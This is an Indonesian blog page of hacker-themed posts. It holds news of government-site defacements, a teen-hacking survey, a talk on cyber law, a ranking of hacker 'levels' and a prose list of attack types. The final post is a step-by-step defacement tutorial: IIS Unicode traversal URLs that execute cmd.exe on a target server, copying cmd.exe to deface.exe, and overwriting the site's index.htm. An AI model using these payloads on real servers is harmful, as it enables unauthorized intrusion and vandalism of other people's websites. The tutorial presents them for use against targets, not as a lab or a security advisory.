Tampilkan postingan dengan label hacker. Tampilkan semua postingan

Protes Penangkapan Hacker, Situs-situs Milik Pemerintah Diserang Anonymous Indonesia

Beberapa waktu lalu, seorang hacker bernama Wildan Yani Ashari ditangkap kepolisian karena melakukan aksi protes dengan men-deface situs pemerintah. Kini, langkah serupa pun diikuti oleh para hacker lain yang mengaku berasal dari grup Anonymous Indonesia.
Beberapa situs pemerintah dengan domain .go.id pun telah berhasil dilumpuhkan. Situs-situs tersebut antara lain adalah KPPU, BPS, Kemenkumham, Kemensos, Indonesia.go.id, KBRI Tashkent, serta Kemenparef.
Langkah ini dilakukan oleh Anonymous Indonesia karena pihak kepolisian telah menangkap Wildan. Mereka menganggap bahwa aksi peretasan situs Presiden Indonesia oleh Wildan merupakan bukti adanya kerentanan keamanan dalam situs tersebut.
“Apakah kalian akan tahu kelemahan sistem website nya? Dan apakah kalian ingin jika website itu dibobol oleh seorang peretas yang tidak bertanggung jawab bahkan kemungkinan data-data bisa hilang, dan bagaimana jika website itu diambil oleh tangan asing yang bukan berasal dari Indonesia?” tulis Anonymous Indonesia.
Sebagai informasi tambahan, meskipun memiliki nama yang mirip, namun Anonymous Indonesia ini bukanlah sebuah grup yang terafiliasi dengan grup hacker Anonymous.
Read more

Baru Diluncurkan, Situs Srimulyani.net 'Dikerjain' Hacker

Baru tiga hari diluncurkan situs srimulyani.net langsung diserang sejumlah hacker. Situs tersebut untuk sementara tak dapat diakses oleh pengguna.

"Under Contruction, Now Protected by XteamCrew," demikian keterangan yang terdapat dalam situs yang beralamat di http://srimulyani.net/.

Hingga saat ini belum diketahui apa motif serangan terhadap situs tersebut. Apakah bermuatan politis atau tidak? mengingat situs tersebut diduga menjadi alat baru bagi para pendukung Srimulyani yang akan mengusungnya di pemilihan presiden 2014.

Seperti diketahui situs tersebut dikelola oleh Perhimpunan Pendidikan Demokrasi (P2D). Situs ini merupakan situs untuk memajukan Etika Publik. Beberapa nama besar ikut meluncurkan srimulyani.net di antaranya, Rahman Tolleng, Bagus Takwin, Rocky Gerung, Rosiana Silalahi dan Wimar Witoelar.

srimulyani.net hendak memulihkan kemerdekaan pikiran warga negara, agar sesama warga negara dapat bergaul setara, tanpa prasangka etnis, agama, ras, dan identitas feodal.
Read more

Hacker Pro Susno Jebol Situs Polisi Bandara


Hacker pendukung mantan Kabareskrim Komjen Susno Duadji semakin agresif. Setelah merusak 60 laman situs yang umumnya di luar negeri, kini mereka giliran mengacak-acak situs resmi Polres Metro Bandar Udara Soekarno-Hatta, AirportPolice-Metro.org.

Hingga Jumat (14/5/2010) petang, pesan utama serangan hacker itu mula-mula ditujukan buat para pengambil keputusan atas pemenjaraan Susno Duadji yang bernyanyi nyaring soal indikasi ketidakberesan di Mabes Polri.

Yang dirusak pun bukan pada laman muka, melainkan pada salah satu sub-nya. Namun, administrator situs itu bereaksi dengan menghapus laman yang dirusak, kemudian membubuhkan olok-olok balik buat hacker.

Nah, olok-olok itulah yang kemudian dibalas lagi oleh hacker pro-Susno yang menyebut diri XR0b0t, dengan menyisipkan pesan di laman mukanya. Kata-katanya dari bahasa Jawa yang sangat kasar.

Sebelumnya, hacker itu menuliskan pesan seperti berikut ini:

"Manakah yang kalian lebih percaya dalam memberantas markus di Institusi Polri dan Kejaksaan: SBY dengan Satgas Mafia Hukum, BHD dengan Tim Penyidik Independen atau Susno Duadji yang sekarang di terali besi? mana keadilan hukum indonesia...pembongkar kasus malah di penjara....

Kebusukan-2 yang ada di tubuh POLRI :
1.Penerimaan personil POLRI menggunakan "uang sogokan"
2.Bagian Personalia POLRI kalau "keliling" ke daerah menerima "upeti" dari Polisi di daerah.
3.Bawahan "setor" ke atasan
4.Naik Jabatan harus ada upeti ke atas-nya (atasnya siapa ya?)
5.Memalak "penjahat" atau yang benar-2 penjahat (menjadikan ATM berjalan)
6.Memungli pengusaha & kongkalikong untuk menutupi suatu kejahatan
7.Mengorganisir penjahat & pura-2 menangkapnya bila tercium media, kmd dilepas lg
8.Mencari-cari kesalahan orang yang tidak berbuat salah untuk cari "duit" atau "melindungi" penjahat sebenarnya.
9.Terima sogokan dari siapa saja,istilahnya "uang damai","uang pelicin" untuk kepentingan diri sendiri tanpa menghiraukan kondisi masyarakat.
10.Cuek saja,bila tidak ada duitnya...contoh : lalu lintas semrawut,sepeda motor ngawur dibiarkan, angkutan umum ngawur dibiarkan.....capek dech!

mana kedisipllinan polisi indonesia....
PAK SBY tolong dong pimpin indonesia dengan baik...."




Read more

Hati-hati Masuk Situs Hacker, Hadiah Segera Menanti Anda

Laporan Google, selama Januari 2009 sampai 2010 sudah mendeteksi dan menemukan lebih dari 11.000 program berbahaya dan website hacker. Halaman web antivirus palsu menyelinap diantara halaman pencarian.

Sejak tahun 2009, peningkatan scareware atau software berbahaya terus meningkat. Dan banyak software malware dirancang khusus untuk menginstall antivirus palsu bagi penguna internet.

Paling tinggi sejak 6 bulan terakhir. Membuat perusahaan antivirus (asli) terus saja mengupdate software mereka setiap hari. Sayangnya beberapa penguna antivirus terlambat beberapa hari mengupdate. Secara drastis akan mengancam komputer karena begitu banyak antivirus dan malware terus bermunculan. Sehinga mengurangi keampuhan software antivirus.

Sebaiknya tidak memasuki situs tertentu baik dari situs pencarian website maupun situs yang kurang dapat di percaya. Mengingat begitu banyak perubahan dari pembuat antivirus palsu, dan melepaskan software malware ke komputer.

Read more

Hacking Sudah Jadi Tren Remaja Masa Kini

Aksi hacking rupanya diminati oleh remaja-remaja di Inggris. Dengan alasan sekadar fun, mereka suka melakukan pembobolan, terutama terhadap akun Facebook temannya sendiri.

Dari survei yang diikuti oleh 1.150 remaja berusia di bawah 19 tahun, diketahui bahwa hampir sebagian dari mereka melakukan pembobolan itu lewat komputer pribadi dan komputer milik sekolah.

Sekadar fun adalah alasan sebagian besar dari mereka, sedang 21% lainnya mengakui bahwa mereka hanya ingin bikin onar. Masih dari hasil survei dari Tufin Technology, 1 dari 4 remaja di Inggris dilaporkan suka melakukan pembobolan itu pada akun Facebook temannya sendiri.

"Hacking ke akun personal bisa menjadi mainan anak-anak bila user tidak mengamankan password mereka, " ujar Stuart Hude, seorang praktisi keamanan internet.

Di luar itu, hal ini tentu saja meresahkan sebab aksi tersebut seperti membuka pintu untuk aksi yang lebih besar lagi.

Terbukti dari partisipan survei terkuak bahwa sebanyak 20% meyakini bahwa aksi-aksi hacking bisa menghasilkan uang, sedang 5% lainnya percaya bahwa hacking bisa menjadi pilihan karir.
Read more

Sedikit Tentang Hacker

Apa itu hacking?
Hacking berasal dari bahasa Inggris yg dapat diartikan sebagai tindakan yang dilakukan seseorang dengan memasuki suatu sistem komputer dengan tujuan untuk mendapatkan info atau ilmu pengetahuan yang tidak ia ketahui sebelumnya.Atau hacking dapat juga diartikan sebagai suatu tindakan seseorang untuk mencari ilmu pengetahuan yang tidak ia miliki atau ia ketahui sebelumnya. Hacker juga dapat didefinisikan dengan “tukang ngoprek”,tidak ada konostasi negatif atau positif, hacker bisa hardware atau software.
Read more
Banyak penjahat internet beroperasi dari Indonesia karena belum adanya "Cyber Law". Akibat hal tersebut, banyak situs web perdagangan elektronik yang memberikan "WARNING" (peringatan) tentang bertransaksi elektronik di Indonesia.

"Misalnya Alibaba.com, salah satu e-bay, mereka menampilkan warning kepada penggunanya agar berhati-hati transaksi elektronik di Indonesia," kata pakar transaksi elektronik Bank Indonesia Iwan Setiawan di Kuala Lumpur, Senin malam.

Iwan mengemukakan hal itu dalam sosialisasi UU No 11/2008 tentang informasi dan transaksi elektronik di KBRI Kuala Lumpur.

"Ketika seminar di London, saya dapat masukan dari para staf kedutaan bahwa banyak orang Inggris 'complain' ke kedutaan karena sudah bayar dan melakukan transaksi perdagangan dengan pihak Indonesia tapi barangnya tidak pernah datang. Dengan adanya UU ini maka kejahatan internet akan semakin bisa dibasmi karena payung hukumnya semakin kuat," kata Iwan.

Ia mengatakan, Malaysia sudah lebih dulu punya UU transaksi elektronik dan 'cyber law' sehingga para penjahat transaksi eletronik pindah ke Batam dan Jakarta.

"Malaysia sudah punya tujuh UU mengenai Cyber Law, sementara Indonesia baru punya satu. Pernah ada kasus pemasangan alat perekam data di kartu ATM sebuah bank di Batam ternyata para pelakunya warga Malaysia yang merugikan nasabah sekitar Rp200 juta," ungkap Iwan.

Dalam sosialisasi tersebut, salah seorang dosen teknologi informasi di sebuah universitas Malaysia, Sony, mengatakan "Walaupun UU Informasi dan Transaksi Elektronik Indonesia sudah komprehensif tapi masih ada kelemahan yakni tidak mewajibkan pengusaha internet memiliki server penyimpan data. Jika seseorang melakukan kejahatan internet via warung internet maka yang kena adalah pengelola atau pengusaha internet tersebut."

Selain itu, Sony juga mengemukakan, dalam UU KIP hanya satu pasal yang mengatur tentang privasi padahal banyak saat ini perusahaan yang memata-matai karyawannya sendiri. "Lalu bagaimana nasib privasi seorang pekerja," tambah dia.

Sementara itu, anggota tim sosialiasi lainnya, dosen FH Unpas Sinta Dewi, mengemukakan saat ini tengah disiapkan UU yang melindungi rahasia pribadi, tapi hal tersebut memerlukan kehati-hatian agar tidak kontradiktif dengan UU KIP.

Seorang ahli perminyakan, Affan, mengungkapkan banyak perusahaan minyak dunia yang mengungkapkan kekayaan minyak atau sumber daya alam Indonesia via internet. "Apakah ada sanksi bagi mereka yang menyebarkan rahasia negara di internet," tanya dia.

Sinta mengatakan, bahwa UU No 11 dan 14 tahun 2008 itu hanya berlaku pada warga negara Indonesia. "Kita tidak bisa menyeret perusahaan asing yang menyebarkan rahasia negara mengenai kekayaan alam Indonesia," ujar Sinta.

Selain Iwan dan Sinta, tim sosialisasi UU N0 11/2008 tentang Informasi dan Transaksi Elektronik dan UU No 14/2008 tentang Keterbukaan Informasi Publik itu beranggotakan Kabalitbang Depkominfo Aizirman Djusan serta anggota komisi I DPR Shidki Wahab.

Sosialisasi ditujukan kepada kepada masyarakat Indonesia di Malaysia dan staf kedutaan setempat.Setelah sosialisasi di Malaysia, rombongan akan melanjutkan sosialisasi ke India.

Nara Sumber : (SHL*)
Read more

TINGKATAN MASYARAKAT HACKER DIMANA AJA

1. Si Dungu
Saya rasa tidak berlebihan untuk menyebut masyarakat pada tingkatan
ini dengan istilah dungu. Mereka hanya memiliki kemampuan teknis
komputer yang rendah dan mengenal hacking dari surat kabar, bahwa
hacker adalah seorang penjahat elektronik.
Bahkan beberapa diantara mereka juga menulis di surat kabar dalam
hal dan konsep yang sama.

2. Lamer
Lamer merupakan sebuah fenomenal awal remaja yang tertarik
mempelajari hacking. Mereka mempunyai kemampuan komputer standar
dan sedikit lebih banyak mendapat informasi.
Mereka mencoba mencari petunjuk serangan praktis. Baik dari e-zine
maupun melalui diskusi IRC (Chatting). Serangan dilakukan dengan
trojan, sebuah remote administration tool yang memberikan akses
terhadap mesin yang telah terinfeksi.
Lamer juga melakukan benyak hal-hal tidak berguna, seperti
tukar-menukar nomor kartu kredit, dan tukar-menukar password
website porno komersial.
Hacker yang kompeten, atau remaja yang berhasil lolos dari
'seleksi alam' akan melalui masa ini dengan begitu cepat memasuki
wilayah penuh keingintahuan.

3. Wannabe
Wannabe hacker menganggap hacking lebih sebagai philosophy, atau
seni kehidupan. Mereka mulai membaca teknik-teknik hacking dasar
dan melakukan searching (pencarian) dokumen-dokumen hack yang lebih
serius. Wannabe telah menunjukkan antusiasnya dalam hacking dan
mulai meninggalkan dunia lamer yang penuh kebodohan.

4. Larva
Perjalanan penuh perjuangan menjadi kupu-kupu. Larva telah
disibukkan dengan berbagai pertanyaan bagaimana benda-benda
bekerja ? Bagaimana dunia bekerja. Larva adalah step terpenting
dalam pembentukan jati diri hacker. Mereka menemukan cara untuk
membuat eksploits sendiri. Mencoba melakukan penetrasi sistem tanpa
melakukan pengerusakan, karena mereka tahu, pengerusakan sistem
adalah cara termudah bagi mereka (sysadmin dan polisi) untuk
menangkap jejak sang larva.

5. Hacker
Sebuah keindahan, naluri, karunia tuhan terhadap orang-orang
yang berjuang. Akhirnya tingkatan tertinggi dari budaya digital
telah dicapai. Sebuah dunia baru menanti. Dunia hacking !!

Sesunguhnya setiap orang tidak akan
tahu kapan pastinya ia menjadi hacker.
Sama halnya dengan anda tidak pernah tahu pasti
kapan anda tertidur.
Hal terpenting adalah terus belajar dan mengembangkan pengetahuan.
Saat anda beristirahat sejenak dan mengenang kembali
... anda telah menjadi HACKER


Kemampuan spesial.

Hacker dalam tahap pendewasaannya
akan mengalami spesialisasi skil/kemampuan.
Mereka akan dikenal sebagai:

1. Wizard
Yaitu seseorang yang memiliki pengetahuan yang begitu banyak
terhadap subyek tertentu.

2. Guru
Seseorang yang tau apapun tehadap subyek tertentu. Mereka
mengetahui fitur-fitur tak terdokumentasi. Trik-trik pengembangan,
dan teknik-teknik mengalahkan keterbatasan - limit -


Hacker sejati mengenal kebodohannya
dan terus mengembangkan diri untuk
mengatasi semua kebodohannya.
Dan dalam perjalanan itu alam mengadakan seleksi,
siapakah yang mampu bertahan ?

REV :
http://www.ElfQrin.com/docs/HackerStages.html


Hacker yang baik

Ajari saya bagaimana menjadi Hacker yang baik
Menjadi hacker mungkin adalah salah satu cita-cita
orang belajar komputer dan internet.
Tetapi apa sebenarnya hacking,
dan apa saja yang harus dilakukan
untuk menjadi seorang HACKER yang baik.

Tulisan berikut akan memberikan petunjuk
langkah per langkah bagaimana anda belajar.
Petunjuk ini cocok juga untuk pemakai internet awal
untuk bagaimana mencari informasi di Internet,
mencari serial number,
membaca artikel security
serta tata cara bertanya yang baik disuatu forum diskusi.

Setelah membaca artikel ini
walaupun anda membatalkan cita-cita anda,
menimal anda telah mengerti pekerjaan berat
apa yang harus dilakukan oleh seorang yang ingin menjadi hacker.

SELAMAT JADI BAJINGAN
Read more

Beberapa cara yang di pakai hacker handal

di tulisan ini si kalo ga salah ya membahas tentang serangan2 ato ancaman dari hacker gitu deh

ok kita mulai

1.SERANGAN PADA PASSWORD
perlu diketahui bahwa jika kita login pa aja kta,harus menggunakan kunci atau password.maka kalau kunci yg kita buat tidak unik atau mudah dbuat,kunci it akan mudah dibo2l dan dtebak ataupun menggunakan metode BRUTE FORCE ATTACK,brutf force attack sesuai

dgn namanya menebak password dgn brutal.yaitu memakai b’bgai kmbinasi kemungkinan.

2.SOCIAL ENGINEERING
metode ini sebagai menyusup dengan sistem memanfaatkan faktor psikologis korban.contoh metode SOCIAL ENGINEERING,sering anda lhat dalam khdpan shari2 kalau ada sms atau telpon yg mengarah kepada hanphone kita dan sms atau telpon itu mengatakan bahwa kita mendapatkan hadiah tertentu.dan untk it anda harus mngeluarkan biaya yg sngat bsar yg bersifat confidential?jika anda mengalaminy,perlu dwaspdai krenas seorng sosial engineer sdang mencri mangsa.

3.MAN IN THE MIDDLE
misalnya seseorng sdang asyik berkomunikasi bertukar informasi melalui sebuah jalur.tidak disangka tiba2 seorang hacker mencegat pesan it lalu dibaca,memodifikasi dan mengirimkan kembali pesan yg sudah beruah tersebut kepda korban.serangan ini disebut man in the middle.

4.SNIFFING
hampir mirip dengan metode MAN IN THE MIDDLE,tapi bedanya hanya mengambil dan menganalisanya tida dimodifkasi.

5.WEB DEFACEMENT
yah,ini merupakan serangan yg umumnya tidak berbahaya.tetapi tetap dgolngkan sbgai perusak,cntoh:jika web defacement berhasil menyerang atau membobol website yg memiliki keamanan tinggi,tentunya akan mengurangi kepercyan pelanggan.
inilah posting kali ini yg saya berikan khusus untuk anda yg membuka blog saya.karena blog yg saya posting ini seharurnya sangat rhasia dkalangan hacker,tetapi saya akan membagi ilmu saya bagi yg setiap x membaca blog ini.pada posting laen x saya akan membahas tetang langkah2 hacking seperti yg dilakukan hacker pada umumnya,moga ilmu ini bermanfaat bagi anda semua,terima kasih.asslamualaiku wr.wb..

maap nii kalo ga berguna coz ak bukan hacker apalagi hacker handal .......
Read more

Cara dan Jenis Hacker Menyerang Situs

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap
server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6
kelas, yaitu:

Intrusion

Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat
menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk
menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).
Hacking is an Art!? =)

Denial of Services (DoS)

Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran
request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting
request pada server secara serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe....)

Joyrider

Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa
belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe
menyebabkan kerusakan atau kehilangan data.

Vandal

Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)

Scorekeeper

Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya
berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan
kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.

Spy

Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin
target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya


1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem.


3. Unix Finger Exploits


Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.

Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.


4. Flooding & Broadcasting


Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.


6. E-mail Exploits


Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.


9.Proxy Server Attacks


Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.


10. Remote Command Processing Attacks


Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.


13. Port Scanning


Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception


TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt.
Read more

Langkah Sederhana Buat Deface

Langkah 1 : Mencari target

Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/

Langkah 2 : Unicode


Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:

http://target/_vti_bin/..%c0%af../.....exe?/c+dir+c:\
http://target/scripts/..%c0%af../..%...exe?/c+dir+c:\
http://target/msadc/..%c0%af../..%c0...exe?/c+dir+c:\
http://target/cgi-bin/..%c0%af../..%...exe?/c+dir+c:\
http://target/scripts/..%255c..%255c...exe?/c+dir+c:\

Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:

Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT

Langkah 3 :Mencari halaman depan

Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:

/c+dir/s+c:\index.htm

Hal ini berarti perintah mencari file index.htm di dalam drive C
Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :

/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm

Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
perintah copy itu sendiri adalah:

/c+copy+c:\

contoh untuk pencopyan adalah:

/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm

untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :

/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe

hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/



Langkah 4 : Meng-Copy file index.htm


echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:

/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\inde x.htm

sehingga tampilan site depan telah terganti dengan tulisan
deface was here

Code:
Catatan:

Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :
Access Denied
